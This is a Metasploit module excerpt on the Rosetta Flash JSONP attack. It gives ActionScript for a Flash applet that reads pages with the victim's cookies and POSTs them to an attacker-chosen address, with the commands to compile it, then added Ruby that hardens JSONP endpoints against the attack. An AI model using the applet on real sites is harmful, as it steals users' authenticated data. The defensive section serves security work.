metasploit-framework

https://github.com/rapid7/metasploit-framework

Ruby

Metasploit Framework

MetasploitModule#encoded_swf

Based on http://miki.it/blog/2014/7/8/abusing-jsonp-with-rosetta-flash/

Alphanumeric Flash swf applet that steals URLs. Compiled from the following code:

class X {
  static var app : X;

  // Fetch one URL with the victim's cookies and, if the "exfiltrate" parameter
  // is set, POST the URL and the fetched body to that address.
  function getURL(url:String) {
    var r:LoadVars = new LoadVars();
    r.onData = function(src:String) {
      if (_root.exfiltrate) {
        var w:LoadVars = new LoadVars();
        w.x = url+"\n"+src;
        w.sendAndLoad(_root.exfiltrate, w, "POST");
      }
    };
    r.load(url, r, "GET");
  }

  // Constructor: the "url" parameter is a comma-separated list of URLs to fetch.
  function X(mc) {
    if (_root.url) {
      var urls:Array = _root.url.split(",");
      for (var i in urls) {
        getURL(urls[i]);
      }
    }
  }

  // entry point
  static function main(mc) {
    app = new X(mc);
  }
}


Compiling the .as using mtasc and swftools:

> mtasc.exe -swf out.swf -main -header 800:600:20 exploit.as
$ swfcombine -d out.swf -o out-uncompressed.swf
$ rosettaflash --input out-uncompressed.swf --output out-ascii.swf
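The applet above only works when a JSONP endpoint reflects an attacker-chosen callback name as the first bytes of its response, so that the alphanumeric SWF produced by rosettaflash is served from the target's origin. The following Ruby is an added example of the server-side hardening a defender would apply; it is not part of the Metasploit module or of the Rosetta Flash tooling. The endpoint shape, the parameter names, the `jsonp_response` and `swf_header?` helpers and the sample callback string are all constructed for illustration.

```ruby
# Added example: hardening a JSONP endpoint against Rosetta Flash style abuse.
# Not part of the Metasploit module; helper names and sample values are constructed.

# Allow-list for callback names: dotted JavaScript identifiers of bounded length.
# Anything else is rejected instead of being echoed into the response.
CALLBACK_RE = /\A[A-Za-z_$][A-Za-z0-9_$]*(?:\.[A-Za-z_$][A-Za-z0-9_$]*)*\z/

def valid_callback?(name)
  return false if name.nil? || name.length > 64
  CALLBACK_RE.match?(name)
end

# Builds headers and body for a JSONP reply.
# The leading "/**/" is the key mitigation: Flash decides whether a response is an
# SWF from its first bytes, so putting bytes that cannot start an SWF signature
# before the reflected callback defeats the attack even if the callback itself
# passes the allow-list (an alphanumeric SWF is a valid identifier).
def jsonp_response(callback, json)
  raise ArgumentError, "invalid callback" unless valid_callback?(callback)
  body = "/**/#{callback}(#{json});"
  headers = {
    "Content-Type" => "application/javascript; charset=utf-8",
    # Stops browsers and plugins from sniffing the body as another type.
    "X-Content-Type-Options" => "nosniff",
    # Flash Player refuses to execute a response served as an attachment.
    "Content-Disposition" => "attachment; filename=f.txt"
  }
  [headers, body]
end

# Detection helper: does a response body begin with an SWF signature?
# "CWS" is a zlib-compressed SWF (what rosettaflash emits), "FWS" an uncompressed one.
def swf_header?(body)
  sig = body.to_s.byteslice(0, 3)
  sig == "CWS" || sig == "FWS"
end

# A naive endpoint that echoes the callback verbatim, for comparison.
def naive_jsonp(callback, json)
  "#{callback}(#{json});"
end

if __FILE__ == $0
  # Constructed stand-in for a Rosetta Flash callback: purely alphanumeric and
  # starting with "CWS". The real payload is longer but has the same shape.
  crafted = "CWSaaaabbbbcccc"
  puts "naive body starts SWF?    #{swf_header?(naive_jsonp(crafted, '{}'))}"
  _h, body = jsonp_response(crafted, '{}')
  puts "hardened body starts SWF? #{swf_header?(body)}"
end
```

In production the `/**/` prefix, `nosniff` and `Content-Disposition: attachment` are set together: the prefix breaks the SWF signature, and the headers stop Flash and browsers from reinterpreting the body regardless of the callback's content. The `swf_header?` check is what a response-scanning test or proxy rule would apply to JSONP replies to confirm the mitigation is in place.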
